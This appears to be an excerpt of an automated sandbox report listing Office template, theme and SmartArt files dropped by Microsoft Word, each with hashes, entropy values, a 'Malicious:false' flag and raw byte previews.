                                                  Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):3.5434534344080606
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                  MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                  SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                  SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                  SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3611324
                                                  Entropy (8bit):7.965784120725206
                                                  Encrypted:false
                                                  SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                  MD5:FB88BFB743EEA98506536FC44B053BD0
                                                  SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                  SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                  SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):288
                                                  Entropy (8bit):3.5359188337181853
                                                  Encrypted:false
                                                  SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                  MD5:0FEA64606C519B78B7A52639FEA11492
                                                  SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                  SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                  SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                  Malicious:false
                                                  Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):274
                                                  Entropy (8bit):3.4699940532942914
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                  MD5:55BA5B2974A072B131249FD9FD42EB91
                                                  SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                  SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                  SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Word 2007+
                                                  Category:dropped
                                                  Size (bytes):3465076
                                                  Entropy (8bit):7.898517227646252
                                                  Encrypted:false
                                                  SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                  MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                  SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                  SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                  SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                  Malicious:false
                                                  Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):3.5026803317779778
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                  MD5:A0D51783BFEE86F3AC46A810404B6796
                                                  SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                  SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                  SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):251032
                                                  Entropy (8bit):5.102652100491927
                                                  Encrypted:false
                                                  SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                  MD5:F425D8C274A8571B625EE66A8CE60287
                                                  SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                  SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                  SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):254
                                                  Entropy (8bit):3.4721586910685547
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                  MD5:4DD225E2A305B50AF39084CE568B8110
                                                  SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                  SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                  SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4243
                                                  Entropy (8bit):7.824383764848892
                                                  Encrypted:false
                                                  SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                  MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                  SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                  SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                  SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                  Malicious:false
                                                  Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):254
                                                  Entropy (8bit):3.4845992218379616
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                  MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                  SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                  SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                  SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):6024
                                                  Entropy (8bit):7.886254023824049
                                                  Encrypted:false
                                                  SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                  MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                  SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                  SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                  SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):256
                                                  Entropy (8bit):3.4842773155694724
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                  MD5:923D406B2170497AD4832F0AD3403168
                                                  SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                  SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                  SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):11380
                                                  Entropy (8bit):7.891971054886943
                                                  Encrypted:false
                                                  SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                  MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                  SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                  SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                  SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):262
                                                  Entropy (8bit):3.4901887319218092
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                  MD5:52BD0762F3DC77334807DDFC60D5F304
                                                  SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                  SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                  SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5596
                                                  Entropy (8bit):7.875182123405584
                                                  Encrypted:false
                                                  SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                  MD5:CDC1493350011DB9892100E94D5592FE
                                                  SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                  SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                  SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                  Malicious:false
                                                  Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4026
                                                  Entropy (8bit):7.809492693601857
                                                  Encrypted:false
                                                  SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                  MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                  SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                  SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                  SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                  Malicious:false
                                                  Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):3.4916022431157345
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                  MD5:1A314B08BB9194A41E3794EF54017811
                                                  SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                  SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                  SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                  Malicious:false
                                                  Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):252
                                                  Entropy (8bit):3.4680595384446202
                                                  Encrypted:false
                                                  SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                  MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                  SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                  SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                  SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                  Malicious:false
